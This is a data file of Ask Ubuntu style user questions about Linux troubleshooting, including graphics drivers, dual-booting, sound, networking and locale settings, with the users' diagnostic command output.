342639	how to manually assign twinview ?	i got nvidia card and i use one crt monitor and lcd television set , connected via hdmi . by default , when tv is connected ( all the time ) mode ( twinview ) is set to : crt : 1152x864_75 +0+0 , dfp : 1280x720_50 @ 1280x864 +1152+0 { viewportin=1280x720 , viewportout=1212x680+34+20 } and it works fine . i got two modes which i manually assign through terminal : only tv : nvidia-settings -- assign 0/currentmetamode= '' dfp-1 : 1280x720 { viewportin=1280x720 , viewportout=1212x680+34+20 } '' only monitor : nvidia-settings -- assign 0/currentmetamode= '' crt-1 : 1152x864_75 '' the problem is , i don`t know how to assign twinview mode manually from terminal .
342640	no wired or wirless on dell 13.04	i am a pretty clueless ubuntu user , so bear with me . yes i have searched extensively for an existing answer , but they all either make no sense to me or do not seem to apply . anyway , i installed a fresh version of 13.04 on my dell inspirion 1721 , and i have no wired or wireless connections . there are no additional drivers available in software and updates . an interesting thing is that if i boot up with the usb stick that i used to install ubuntu , the wired connection works fine and the broadcom driver is listed in software and updates - additional drivers . if anyone could point me in the next direction to go , i would greatly appreciate it . cat /ect/lsb-release ; uname -a cat : /ect/lsb-release : no such file or directory linux mike-inspiron-1721 3.8.0-19-generic # 29-ubuntu smp wed apr 17 18:19:42 utc 2013 i686 athlon i686 gnu/linux lspci -nmk | grep -ia2 net 03:00.0 ethernet controller [ 0200 ] : broadcom corporation bcm4401-b0 100base-tx [ 14e4:170c ] ( rev 02 ) subsystem : dell device [ 1028:01fd ] 03:01.0 firewire ( ieee 1394 ) [ 0c00 ] : ricoh co ltd r5c832 ieee 1394 controller [ 1180:0832 ] ( rev 05 ) -- 0b:00.0 network controller [ 0280 ] : broadcom corporation bcm4311 802.11a/b/g [ 14e4:4312 ] ( rev 01 ) subsystem : dell wireless 1490 dual band wlan mini-card [ 1028:0007 ] kernel driver in use : wl lsusb bus 001 device 003 : id 0930:6544 toshiba corp. kingston datatraveler 2.0 stick ( 2gb ) bus 002 device 002 : id 045e:0745 microsoft corp. nano transceiver v1.0 for bluetooth bus 005 device 002 : id 0a5c:4500 broadcom corp. bcm2046b1 usb 2.0 hub ( part of bcm2046 bluetooth ) bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 003 : id 0a5c:4502 broadcom corp . keyboard ( boot interface subclass ) bus 005 device 004 : id 0a5c:4503 broadcom corp . mouse ( boot interface subclass ) iwconfig lo no wireless extensions . lsmod module size used by nls_utf8 12493 1 isofs 39211 1 nls_iso8859_1 12617 1 parport_pc 27504 0 bnep 17669 2 ppdev 12817 0 rfcomm 37420 0 bluetooth 202069 10 bnep , rfcomm snd_hda_codec_idt 63896 1 snd_hda_intel 38307 3 snd_hda_codec 117580 2 snd_hda_codec_idt , snd_hda_intel ssb 69217 1 snd_hwdep 13272 1 snd_hda_codec snd_pcm 80890 2 snd_hda_codec , snd_hda_intel wl 3027822 1 snd_page_alloc 14230 2 snd_pcm , snd_hda_intel radeon 870822 3 snd_seq_midi 13132 0 snd_seq_midi_event 14475 1 snd_seq_midi ttm 71289 1 radeon snd_rawmidi 25114 1 snd_seq_midi snd_seq 51280 2 snd_seq_midi_event , snd_seq_midi drm_kms_helper 47545 1 radeon r852 17873 0 sm_common 16772 1 r852 snd_seq_device 14137 3 snd_seq , snd_rawmidi , snd_seq_midi drm 228750 5 ttm , drm_kms_helper , radeon snd_timer 24411 2 snd_pcm , snd_seq snd 56485 15 snd_hwdep , snd_timer , snd_hda_codec_idt , snd_pcm , snd_seq , snd_rawmidi , snd_hda_codec , snd_hda_intel , snd_seq_device nand 49670 2 r852 , sm_common soundcore 12600 1 snd kvm_amd 50336 0 nand_ecc 13105 1 nand nand_bch 13003 1 nand joydev 17097 0 lib80211 14040 1 wl sp5100_tco 13447 0 kvm 376505 1 kvm_amd i2c_algo_bit 13197 1 radeon bch 17226 1 nand_bch cfg80211 436177 1 wl dell_wmi 12601 0 dell_laptop 17161 0 i2c_piix4 13066 0 sparse_keymap 13658 1 dell_wmi r592 17707 0 dcdbas 14021 1 dell_laptop memstick 15842 1 r592 nand_ids 8547 1 nand mtd 38922 2 nand , sm_common psmouse 81038 0 shpchp 32129 0 mac_hid 13037 0 k8temp 12842 0 serio_raw 13031 0 wmi 18590 1 dell_wmi video 18894 0 ati_agp 13177 0 lp 13299 0 parport 40753 3 lp , ppdev , parport_pc hid_generic 12484 0 usbhid 41805 0 hid 82666 2 hid_generic , usbhid pata_acpi 12886 0 usb_storage 47684 1 firewire_ohci 35292 0 sdhci_pci 18158 0 sdhci 31824 1 sdhci_pci pata_atiixp 13058 1 firewire_core 61718 1 firewire_ohci crc_itu_t 12627 1 firewire_core ahci 25507 2 libahci 26108 1 ahci the 'rfkill list all ' comand returned nothing . thanks
342646	how to install kubuntu over lubuntu ?	i have a windows 8 computer set to dual-boot with lubuntu . i want to make the computer dual-boot kubuntu instead of lubuntu . how can i install kubuntu over lubuntu ? i do n't want to loose windows 8 . both lubuntu and kubuntu are version 13.04 . thanks for any help .
342647	nvidia 325 driver	i added xorg-edgers ppa and got this drivers in my additional menu i thought this ppa should provide proprietary drivers but in the menu i see 325 ( open source ) so i have a question is this driver open source or propitiatory . thank you in advanced
342648	login screen does n't appear automatically , need to press ctrl+alt+f1 and then ctrl+alt+f7	i am new to ubuntu , used mandriva for years but that was a long time ago . i recently installed ubuntu 12.04 on a hptx1000 . everything was working fine but recently when i boot up i do n't get a login screen . if i hit ctrl+alt+f1 and thenctrl+alt+f7 i get the login screen and everything is fine . any clues as to why the login screen is n't automatically coming up ?
342649	multiple gsm dongles	i 'm using wvdial to connect two 3g dongles . i put the dongles on my pc and both are recognized and setup correctly . i 've used first one or second one separated having success , but if i try to connect both , strange thing happen . when i connect the second interface , the first are disconnected and all usb devices are bloqued , inclusive the keyboard and mouse . apparently the os restarts all usb devices ... i ca n't understand if this is true and for what reason it 's occurs ... please , if someone can help me , i really appreciate ... i can send logs , version , etc , but i do n't know at this moment what information is relevant to get the diagnostics . thanks !
342650	problem running a command with incron	i try to print some odt documents from libreoffice 4 ( ubuntu 13.04 os ) to a toshiba e-studio 167 printer . when the document has fonts like liberation sans , liberation serif , etc. , i get a printed page with the next error : error : invalidfont offending command $ definefont stack : -- nostringval -- /wasrnp+liberationserif -- nostringval -- /wasrnp+liberationserif -- nostringval -- -- nostringval -- 17 however , if export odt file to pdf and i print pdf file or if i print another pdf file from acrobat , there 's no problem . i 've been trying the solutions given in this threads , but if i change printer language type to postscript , i get the same error : unable to print from libreoffice problem printing in libreoffice writer but not in adobe acrobat reader or evolution to try to resolve the problem i configured incron in order to print to a pdf printer first , and then printing the file to the printer . any of this commands work from the command line , and the file is printed ok : cat < file.pdf > | acroread -topostscript | lpr -p < printer name > cat pdf2ps < file.pdf > | lpr -p < printer name > but it does n't ( the printer does nothing ) , if i put them in the file opened when running `` incrontab -e '' . incrontab -e /home/ < user > /pdf in_close_write cat $ @ / $ # | acroread -topostscript | lpr -p < printer name > save the file or incrontab -e /home/ < user > /pdf in_close_write cat pdf2ps $ @ / $ # | lpr -p < printer name > save the file incron works ok with other commands , like cp . on the other hand , the next two possible configurations for `` incrontab -e '' make the printer work , but with the problem i mentioned at the begining . could be a problem with pipes ? /home/launion/pdf in_close_write /usr/lib/libreoffice/program/soffice -- invisible -- norestore -pt < printer name > $ @ / $ # /home/launion/pdf in_close_write lpr -p < printer name > -o resolution=600x600dpi -o pagesize=a4 -o duplex=none $ @ / $ #
342653	how to eliminate old ubuntu boot option	i installed ubuntu on a live usb stick and i used this just to explore ubuntu . when i start up my computer ( hp envy 15 w/windows 7 ) it still gives me the option to start up with windows 7 or ubuntu . the ubuntu option never worked for me so i uninstalled ubuntu from the usb drive . how do i get rid of the boot option for ubuntu ? i ca n't get rid of it , and even though i do n't have ubuntu on this computer anymore , it still offers to boot with it . how do i get rid of this ? how to completely get rid of all ubuntu files on this computer ? ( i now have another computer which i only use ubuntu on ) . thanks .
342654	the software center wo n't start anymore , how to fix it ?	i have been using ubuntu 13.04 for last 2 months . it was working properly but suddenly the ubuntu software center has started hanging . now it does n't open . and every time i try to open it , i have to force quit it . so that i am not able to install the software that i need . what do i do ?
342655	is there any systems dynamics software packaged for ubuntu ?	i 'm looking for systems dynamics software ( e.g . stella ) for ubuntu , preferably open source . recommendations for non packaged software that runs on linux are also welcome . thanks .
342657	screen problem when playing planetside 2 on ubuntu 12.04	recently started using crossover and installed planetside 2 . i have tried to install planeside 2 in steam and as a standalone from steam but i keep running into the same graphical problem . each time i start the game the menu and the game it self is red , everything is red except a few menu items and hud items . here are more images of what i am talking about . more images
342658	does dropbox work ok with ubuntu server 13.04 ?	i run a minecraft server that stays in sync with dropbox and currently i have been using ubuntu desktop . i want to switch to ubuntu server 13.04 , i have been practicing with ubuntu server somewhat . i 'm about to buy a vps from digitalocean soon and was hoping i could have dropbox working with ubuntu server . any suggestions ?
342660	better `` screenshot-reader '' in ubuntu	according to how can instantaneously extract text from a screen area using ocr tools ? and system responses i use sh screen_ts.sh , the content of which is # ! /bin/bash scrot -s zkoscr_img.png tesseract zkoscr_img.png zkoscr cat zkoscr.txt|xclip -i -selection clipboard . the terminal responses tesseract open source ocr engine v3.02 with leptonica , but the text is recognized with too many errors , even in the terminal window itself . the abbyy screenshot reader in windows xp is far better . can i achieve such better results in the ubuntu ? how ? thanks .
342664	nvidia driver updated - mixed versions of 304.88 and 319.32	my problem is that after trying to update my driver through the additional drivers gui i ca n't boot ubuntu with gui anymore , since xorg says the kernel module is of version 304.88 ( the old version before i updated ) but the driver components are of version 319.32 ( the new version ) this is the output of dpkg -l | grep nvidia dkpg -l | grep nvidia ii nvidia-304 : 304.88-0ubuntu0.0.3 nvidia binary xord driver , kernel module and vdpau library ii nvidia-319 : 319.32-0ubuntu0.0.1 nvidia binary xord driver , kernel module and vdpau library ii nvidia-common : 1:0.2.44.2 find obselete nvidia drivers ii nvidia-current : 304.88-0ubuntu0.0.3 transitional package for nvidia-current ii nvidia-settings : 304.88-0ubuntu.0.0.3 transitional package for nvidia-settings ii nvidia-settings-304 : 304.88-0ubuntu.0.0.3 tool for configuring the nvidia graphics driver ii nvidia-settings-319 : 319.32-0ubuntu.0.0.1 tool for configuring the nvidia graphics driver that 's the output of that file . the message startx gives me is : nvidia : api mismatch : the nvidia kernel module has version 304.88 , but this nvidia driver component has version 319.32 . please make sure that the kernel module and all nvidia driver components have the same version . fatal server error : no screens found i understand that something went wrong during the update , so i wonder how to fix this so that the remaining parts of 304 are removed and replaced with 319 . i do n't know hwere to start because i thought that nvidia-current was the one that would update to 319 and so reinstalling that did n't work . and i googled and found that somebody said to try to install/reinstall/uninstall this package : nvidia-current-updates-dev but i did n't have that package installed so it did not help . other than that , i am clueless . i hope the information i provided will be enough so i can get an answer soon . edit : lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.3 lts release : 12.04 codename : precise uname -a linux squad 3.2.0-52-generic # 78-ubuntu smp fri jul 26 16:21:44 utc 2013 x86_64 x86_64 x86_64 gnu/linux
342668	updating from 12.04 to 13.04	i had issues updating to 13.04 from 12.04 , so i went for a clean install of 13.04. the installation process went smoothly , and ubuntu prompted me to restart in order to complete the installation . when i clicked on restart , instead of restarting , i got a black screen . after about 10 minutes , i shut it down , and booted up . when i was using 12.04 , i could select vista or ubuntu . now , it automatically boots windows .
342669	virtualbox vt-x is not available	so i had virtual box working perfectly before i decided to do a complete system wipe recently . upon re-installing a 64 bit version of ubuntu 13.04 and running a full upgrade , i attempted to set my virtualbox up again ; however when ever i try to start my vm , i receive the following error : failed to open a session for the virtual machine windows 7 x64 ultimate . vt-x is not available . ( verr_vmx_no_vmx ) . result code : ns_error_failure ( 0x80004005 ) component : console interface : iconsole { db7ab4ca-2a3f-4183-9243-c1208da92392 } i 'm using the ose version from the ubuntu software center . i also tried the puel edition from oracle 's website , no luck . any help ?
342670	how to either install ubuntu correctly without affecting win 8 or remove it safely ?	my pc is hp pavilion p6-2390 . i am a beginer in ubuntu . so explain it simple and as detailed as possible ( with pictures if you can ) . so here is what i did . made a live usb like shown on ubuntu website . plug it in . changed the boot order to uefi : sandisk ... . did nothing to bios . so it is still in uefi and secure boot . so i installed it on a partition of 20gb that i made in win 8 . used the `` something else '' option and made the `` swap area '' and root partiton . installed it and after i restarted it i got this screen : so i did the boot-repair instructions on the other posts . - it says `` efi detected ! '' and gave me this link : http : //paste.ubuntu.com/6049761/ . - after pressing yes and agree and all , it ask me to disable secure boot . - so i disable secure boot and enable legacy . it did n't work . i also disable legacy , it still did n't work . - somehow i got into windows recovery thing and reinstalled win 8 . but it still did n't fix the issue . ubuntu partition is still there . so here is how i run my computer now . ( i somehow figured this myself ) right after i start my computer , i press esc to show `` startup menu '' . then i go `` run uefi application ... '' . then a `` file browser '' pops up . then i go hdd - > efi - > ubuntu - > grubx64.efi to get to grub . ( imgur.com/a/2zacm ) ( shim64.efi also seems to work the same way ) . from grub i choose `` windows boot uefi loader '' , to start windows 8 . i also can get to ubuntu from grub . i can not post more than 2 links because i am new . please help me to either install ubuntu correctly without affecting win 8 or remove it safetly ?
342678	wrong locale alpha-numeric display in spite of locale settings ?	i have just upgraded from kubuntu 12.04 to 13.04 , reassigning my former home partition to this new version . though i live in nepal , locale settings are set to show english . however , some applications show nepali numbers or letters . skype shows nepali numbers to display time in chats . conky ( vainly ) displays date and time using nepali numbers and letters . dolfin shows nepali number to indicate disk usage . how can i impose the right locale settings on those applications ? edit : i found a documentation on locales . locale returns : lang=en_gb.utf-8 language=en_gb : en lc_ctype= '' en_gb.utf-8 '' lc_numeric=ne_np lc_time=ne_np lc_collate= '' en_gb.utf-8 '' lc_monetary=ne_np lc_messages= '' en_gb.utf-8 '' lc_paper=ne_np lc_name=ne_np lc_address=ne_np lc_telephone=ne_np lc_measurement=ne_np lc_identification=ne_np lc_all= so obviously , the np should n't be here . i have to find a way to change the settings through terminal since my system settings > locale do n't seem to take effect . ( something went wrong with the upgrade ? )
342679	ld : can not find -ljson	i tried running sudo apt-get install libjson-glib-dev with no luck . was not able to find anything useful by googling either . anyone know what package i need to install to be able to link json ?
342682	webmin alternative that installs & runs on the client machine & communicate via ssh	are there any webmin alternatives that do n't consume server resources but instead install on client machine & communicate via ssh client . so effectively all the actions made on that gui are converted to terminal commands & executed via ssh . are there any tools like that to communicate to a remote ubuntu server ?
342687	my mouse only works inside the current window	clicks anywhere outside of the active window are not registered . even the title bar and menu buttons are unresponsive . keyboard shortcuts that would normally get me to other windows also do n't work . in order to get out of the active window i have to hit tab until i can highlight a close button . i 'm dual-booting windows 8 and ubuntu 12.04 .
342690	is it possible to install llvm and clang on a usb drive ?	i recently installed python3 in a local folder , as opposed to the entire system , on a shared hosting account and everything worked out perfectly . i was wondering if a similar thing could be done with llvm and clang . instead of a local folder , i wanted to install them on a usb drive . my sysadmin does n't want to install clang system-wide because he does n't want to risk breaking anything . also , my disk quota is only about 200mib . i want to use clang because it outputs way more descriptive errors than gcc . has anyone ever tried doing this ? does anyone have any guidance ? any warnings ? is this even possible ? ideally , i was thinking i could do something like this . /mnt/usb/clang code.c -o code
342692	how to copy files from multiple directories ?	i have a bunch of text files in several directories i want to copy into another . what can i do , instead of going inside each directory and cp *.txt in this directory ?
342695	ca n't move/resize windows with logitech wireless mouse connected ( precise )	on 12.04 precise , when i connect a logitech wireless mouse ( m305 ) , i 'm no longer able to drag windows around via their title bar or resize them . also , the selection highlight does n't seem to track the cursor properly and i 'm unable to click on some things . the cursor moves around smoothly and is completely responsive - i 'm just very limited in click/drag options . is there an alternate driver besides the built-in hid driver that might fix this ?
342697	how to boot ubuntu after installing windows 8 on another partition ?	ubuntu was my first os . after that , i created another 2 partitions in my hdd and set up windows 8 . now windows 8 is running automatically . there is no dual boot option left . is there anyway to get my ubuntu system back ? or at least save my files ? i can not find the partition that had ubuntu
342699	no sound devices displayed in settings , but speakers work and startup noise plays	i 'm running an ubuntu13.04 clean install on an hp pavilion g6-1d80nr laptop , and there is no sound . there are no sound devices listed in the sound panel of system settings , and the volume applet exists , but does n't actually work . the original problem was multiple sound cards being registered , and the wrong one set to default ; i could see them with lspci , aplay , etc . i fixed this by commenting out a few options in /etc/modprobe.d/alsa-base.conf , and now the drum noise plays on the login screen , and there the volume applet is fully functional ; i can also play sound with test-speakers and aplay . however , there are still no sound devices listed under system settings ( not even dummy output , and searching google only returns results that specifically are showing that ) , and no sound plays from any applications . now the problem seems to be with pulseaudio , which fails on startup with some rubbish about permissions of my home folder : ~ $ pulseaudio -vv i : [ pulseaudio ] main.c : setrlimit ( rlimit_nice , ( 31 , 31 ) ) failed : operation not permitted i : [ pulseaudio ] main.c : setrlimit ( rlimit_rtprio , ( 9 , 9 ) ) failed : operation not permitted d : [ pulseaudio ] core-rtclock.c : timer slack is set to 50 us . d : [ pulseaudio ] core-util.c : realtimekit worked . i : [ pulseaudio ] core-util.c : successfully gained nice level -11 . i : [ pulseaudio ] main.c : this is pulseaudio 3.0 d : [ pulseaudio ] main.c : compilation host : x86_64-pc-linux-gnu d : [ pulseaudio ] main.c : compilation cflags : -g -o2 -fstack-protector -- param=ssp-buffer-size=4 -wformat -werror=format-security -wall -w -wextra -pipe -wno-long-long -wno-overlength-strings -wunsafe-loop-optimizations -wundef -wformat=2 -wlogical-op -wsign-compare -wformat-security -wmissing-include-dirs -wformat-nonliteral -wpointer-arith -winit-self -wdeclaration-after-statement -wfloat-equal -wmissing-prototypes -wredundant-decls -wmissing-declarations -wmissing-noreturn -wshadow -wendif-labels -wcast-align -wstrict-aliasing -wwrite-strings -wno-unused-parameter -ffast-math -wp , -d_fortify_source=2 -fno-common -fdiagnostics-show-option d : [ pulseaudio ] main.c : running on host : linux x86_64 3.8.0-19-generic # 30-ubuntu smp wed may 1 16:35:23 utc 2013 d : [ pulseaudio ] main.c : found 2 cpus . i : [ pulseaudio ] main.c : page size is 4096 bytes d : [ pulseaudio ] main.c : compiled with valgrind support : no d : [ pulseaudio ] main.c : running in valgrind mode : no d : [ pulseaudio ] main.c : running in vm : no d : [ pulseaudio ] main.c : optimized build : yes d : [ pulseaudio ] main.c : fastpath defined , only fast path asserts disabled . i : [ pulseaudio ] main.c : machine id is e8ba9b2a4a942dc8a48d4b2352273fc1 . i : [ pulseaudio ] main.c : using runtime directory /run/user/skye/pulse . e : [ pulseaudio ] core-util.c : home directory not accessible : permission denied i then tried every available solution to that with no avail , including purging/reinstalling it . when run as root in system mode , pa returns the following : ~ $ sudo pulseaudio -- system w : [ pulseaudio ] main.c : running in system mode , but -- disallow-exit not set ! w : [ pulseaudio ] main.c : running in system mode , but -- disallow-module-loading not set ! n : [ pulseaudio ] main.c : running in system mode , forcibly disabling shm mode ! n : [ pulseaudio ] main.c : running in system mode , forcibly disabling exit idle time ! w : [ pulseaudio ] main.c : ok , so you are running pa in system mode . please note that you most likely should n't be doing that . w : [ pulseaudio ] main.c : if you do it nonetheless then it 's your own fault if things do n't work as expected . w : [ pulseaudio ] main.c : please read http : //pulseaudio.org/wiki/whatiswrongwithsystemmode for an explanation why system mode is usually a bad idea . e : [ pulseaudio ] module-alsa-card.c : failed to find a working profile . e : [ pulseaudio ] module.c : failed to load module `` module-alsa-card '' ( argument : `` device_id= '' 0 '' name= '' pci-0000_00_01.1 '' card_name= '' alsa_card.pci-0000_00_01.1 '' namereg_fail=false tsched=yes fixed_latency_range=no ignore_db=no deferred_volume=yes use_ucm=yes card_properties= '' module-udev-detect.discovered=1 '' '' ) : initialization failed . w : [ pulseaudio ] authkey.c : failed to open cookie file '/var/run/pulse/.config/pulse/cookie ' : no such file or directory w : [ pulseaudio ] authkey.c : failed to load authorization key '/var/run/pulse/.config/pulse/cookie ' : no such file or directory w : [ pulseaudio ] authkey.c : failed to open cookie file '/var/run/pulse/.pulse-cookie ' : no such file or directory w : [ pulseaudio ] authkey.c : failed to load authorization key '/var/run/pulse/.pulse-cookie ' : no such file or directory i 'm not sure if it 's actually the problem or not ( i do n't think it explains the lack of a dummy output ) , and any help would be appreciated ; i do n't really care if i have pulseaudio , i just want sound . anybody have any suggestions ?
342702	ignoring unknown interface wlan0=wlan0	so here 's a weird one . my wireless works fine if i configure it manually , but fails miserably when i try and configure it in /etc/network/interfaces . i think i 've tracked it down to ifup not recognizing it as an actual device . here 's relevant infos : root @ cubieboard : ~ # cat /etc/network/interfaces # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback auto eth0 iface eth0 inet dhcp auto wlan0 iface default inet static address 10.0.0.20 netmask 255.255.255.0 root @ cubieboard : ~ # ifconfig wlan0 wlan0 link encap : ethernet hwaddr 80:1f:02:9a:9c : c6 up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:187 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) root @ cubieboard : ~ # ifup wlan0 ignoring unknown interface wlan0=wlan0 .
342703	system will not power down on shutdown	i 'm having problems with shutdown on my dell inspiron 14z-5423 . when i shut down , i hear the hard disk stop but the machine does not actually power down . interestingly , when i do a restart , the machine powers off just fine and then powers on a few seconds later as expected . relative linux newbie here - what logs would be good to look at ? i have tried following command but it does n't make any difference : sudo shutdown -p now
342705	how to set a static ip address ?	apt-get fail to resolve the mirror . i am using my server as a backup server to one of my website servers . so i had to initially set a static ip address ... how can i do it ?
342719	vmware workstation 10 at startup vmmon error	until yesterday i was having workstation 9 startup with ubuntu ( just added an entry in the startup applications gui ) . when i start my ubuntu , workstation comes up and every thing runs fine . then , i upgraded to workstation 10 . every thing appears to work with no isues , except , it will not startup my virtual machine when it is launched at startup . it shows these errors : could not open /dev/vmmon : no such file or directory . please make sure that the kernel module `vmmon ' is loaded . then , failed to initialize monitor device . then , unable to change virtual machine power state : internal error otherwise , if i just try to play the virtual machine again ( by pressing play ) , it works . maybe it is a vmware bug . please , any advise ?
342720	how to `` switch user '' under kde without locking the current session ?	the family computer has 3 users ( mom , dad and daughter ) . all 3 use kde . daughter is too young to deal with passwords , so she is a member of the nopasswdlogin group so she can log in without a password . however , when daughter is logged in and dad wants to use the computer , dad goes to `` switch user '' and logs in to his account . when daughter wants to play again , she goes to `` switch user '' to log back in to her account . she is then faced with a `` this session is locked '' dialog and prompted for a password . the same thing happens when daughter is logged in and the computer goes to sleep . upon waking up , her session is locked and she is prompted for a password . how can i configure daughter 's kde account so that she is not prompted for a password when either switching back to her account or when the computer wakes up ?
342722	uninstalling some redundant ubuntu installations	i’m kinda new to ubuntu and i’m making a slow but safe progress . i had version 12.04 installed , until i upgraded to 12.10 , and than it stopped working . long story short , i had 5 ubuntu’s installed - two 12.10 , two 11.10 and one 13.04 . i would like to clear up the mess . this is how my hd looks like now , i wanted to leave just one 11.10 and the 13.04 so i uninstalled some os ( 12.04 x 2 + 11.10 x 1 ) with os-uninstaller . however the partitions of those os are still there . i would like to remove those partitions , and to minimize the 11.10 hd consumption ( later on i would like to add a partition for windows ) . i read some about the partitioning ( like https : //help.ubuntu.com/community/howtopartition ) but i’m still not sure what to do . my questions are 1 . how can i know which partition belongs to which os `` instance '' ? i 'm working from the 13.04 and i want to remove all partitions , but the partitions used by the 13.04 and by the 11.10 2 . i have 4 linux-swap partitions , can i instruct both os ( 13.04+11.10 ) to use the same space as swap ? thanks a lot tamir
342727	python errors when installing logmein hamachi	when i go to install the beta version of logmein hamachi for linux using the .tgz file download , i get this error when i run the install.sh file : traceback ( most recent call last ) : file `` /usr/lib/lsb/install_initd '' , line 3 , in < module > import sys , re , os , initdutils file `` /usr/lib/lsb/initdutils.py '' , line 18 raise valueerror , 'need a file or string' i have lsb installed which is a requirement to install hamachi . does anyone know what is wrong ?
342728	installing ubuntu 13.04 on macbook air ( mid 2012 ) [ help ]	yesterday i 've decided to try ubuntu 13.04 on my macbook air , within a day i really love and enjoy it ! so , i followed every step by step instructions on the internet . installation process run just fine ... in `` something else '' section i make : dev/sda1 efi dev/sda2 ext4 / dev/sda3 ext4 /home after installation completed , i restart my mac and nothing appear . just white screen and folder with `` question mark '' on it . i think i repeated my installation setup about 20 times , playing around with the `` dev/sda '' and the result still the same . right now my mac does n't have operating system on it because i 've deleted mac os x and does n't have a backup files/system . can anyone help or guide me how am i supposed to do . thanks in advance : ( [ update ] just want to update my post , currently running ubuntu 13.10 without no errors ! thanks to this website and google of course ; ) i am using macbook air ( 2012 ) so , i have to download the .iso specifically design for mac , here it is http : //releases.ubuntu.com/saucy/ and make sure to select `` version+mac '' iso version . in the installations section , select `` something else '' and i did this dev/sda1 /boot 500mb dev/sda2 / 20000mb dev/sda3 swap area 4000mb dev/sda4 /home whatever left memory everything 's work smoothly .
342731	how to get rid of dual booting and only use ubuntu	i just installed ubuntu from wubi and it automatically made it dual boot but i want it to only boot from ubuntu . i have not tried anything yet because i do n't want to ruin my computer .
342732	why is a group writable directory considered unsafe ?	more specifically , why does libslack 's daemon consider files that are being executed in a group writable directory to be `` unsafe '' ? if you can give me an explanation of why group writable directories are considered unsafe in just a general sense that would be nice too . sorry , apparently this was too unclear . in libslack 's daemon man page it states : -u , -- unsafe allow reading an unsafe configuration file and execution of an unsafe executable . a configuration file or executable is unsafe if it is group or world writable or is in a directory that is group or world writable ( following symbolic links ) . if an executable is a script interpreted by another executable , then it is considered unsafe if the interpreter is unsafe . if the interpreter is /usr/bin/env ( with an argument that is a command name to be searched for in $ path ) , then that command must be safe . by default , daemon ( 1 ) will refuse to read an unsafe configuration file or to execute an unsafe executable when run by root . this option overrides that behaviour and hence should never be used . at the end it states that this option ( the unsafe option ) should never be used apparently/assumably due to security concerns . i personally ca n't really seem to think of what would be so inherently unsafe about daemonizing something that resides within a group writable directory . i do n't see why my question was put on hold either because it seems like a rather straight-forward question to me for anyone that actually read it but here is an attempt to write it out more clearly . why is it considered unsafe for a file to have a directory in its path that is group writable ? for me this is more specifically in regards to libslack 's daemon but i have seen multiple other packages flag the same scenario as unsafe as well , so if you could provide me with some information as to what type of security issues i could expect due to me running -- despite the warning -- daemon with the unsafe flag , that would be wonderful .
342733	command line , no desktop environment	i have installed an ubuntu in a computer with windows , but when i open the computer with ubuntu , there 's no desktop environment , only a command line . i 've even written my username and password on command line but it 's still just a command line . extra info : when i choose `` try ubuntu '' with usb booting , there is no desktop neither . i have no internet connection on this computer for instance edit : i 've written the code with lightdm , the screen is full of `` starting '' and `` stopping '' different things such as `` lightdm display manager '' or `` save kernel messages '' . only `` stopping anac ( h ) ronistic cron '' fail others ok. still no desktop edit2 : i added nomodeset and second time modeset=0 in the gnu grub screen . ctrl-x did n't work but i could have boot with f10 ( it was written below the screen ) . both did n't do any change . when i tried to set them permanently as in the forum : http : //ubuntuforums.org/showthread.php ? t=1613132 gksudo gave me an error message . by the way when i 'm opening the computer windows is directly opened if i do n't press on esc to enter boot options by f9 . i read that it can be because of number of parts more than 4 in hard disk .
342734	increase menu bar size	i 'm wondering if there is a way to increase the menu bar size at the top of the screen . i installed 12.04 lts on my home theater pc , but the mouse is n't as precise ( pardon the pun ) as on my laptop . i want to make it easier to use the bar and easier to click the minimize and close buttons . i 'm using unity , but i 'm not super adverse to switching ui . thanks !
342737	help installing dual-boot ubuntu *.* . * with pre-installed windows 8 with windows boot manager . hp pavilion touchsmart sleekbook 15	i have recently bought an hp laptop ( hp pavilion touchsmart sleekbook 15 ) , pre-installed with windows 8 . i do like windows 8 , but i wish to also have the functionality of ubuntu on my laptop . i do not like the look and risks of grub , as i care for windows 8 more than ubuntu ( can not replace windows ) , so i need to use windows boot manager of the metro ui . ( which i also like the look of more ) . i know my computer has windows installed in uefi mode , but i am also not big on complicated steps and heavily modifying my laptop . i have looked for multiple solutions to this problem , but one is just windows boot manager in bios mode , another is using grub in efi mode . i definitely know i can disable secure and fast boot on my computer , and i can manually partition anything i want . i do not know much about linux either , so i need help on a simple , reliable way to dual-boot ubuntu and windows 8 on my laptop in efi mode on windows boot manager . i have a live flash drive for ubuntu already , and am ready to install anything , but i am reluctant because i can not afford another laptop . currently , i have ubuntu 12.04.3 on my flash , but i can change it to whatever needed at will . can anyone help me do this on my laptop , or should i just give up right now ? i am sick of trying to find these answers but to no solution . all i need is a solution to pre-installed windows 8 uefi windows boot manager simple , reliable way to do this . thank you for all help that you can give me , -ben note : this is not the same question as ( installing ubuntu on a pre-installed windows 8 ( 64-bit ) system ( uefi supported ) ) at all . here i am asking how you would go around installing ubuntu on pre-installed windows 8 as i have not installed anything yet . in the `` answered question '' the asker is asking about wubi on windows 8 preinstalled , after he tried installing it . please read both questions before flagging this down .
342742	`` next song '' function key ( mac ) on ubuntu	i have installed ubuntu 12.04 on my imac 2011 . i want to use the function keys on the keyboard to skip to the next song , but i get this splash when i press the key : can you help me ?
342743	thunderbird 's indicator does n't show the bubbles in 13.04	i have tried the solutions that i found here . these two , mainly : why wo n't thunderbird report notifications to the indicator-applet on 12.04 ? and why are n't certain indicators showing in unity ? ( i have made that array that to 'all ' ) but i still do n't get a bubble when i get an new e-mail . suggestions anyone ?
342744	shell script errors ?	i am trying to create an interactive bash shell script to make it easier to install and configure a postfix mail server , but have them still enter the commands and then the shell run them , but i keep getting this error and i do n't know why . these two lines are giving me the error `` too many arguments '' if test $ var1 = sudo apt-get install postfix and until test $ var1 = sudo apt-get install postfix thanks .
342746	how can i change country in amazon webapp ?	amazon webapp launches the us site . how can i change it to the uk version of the website ?
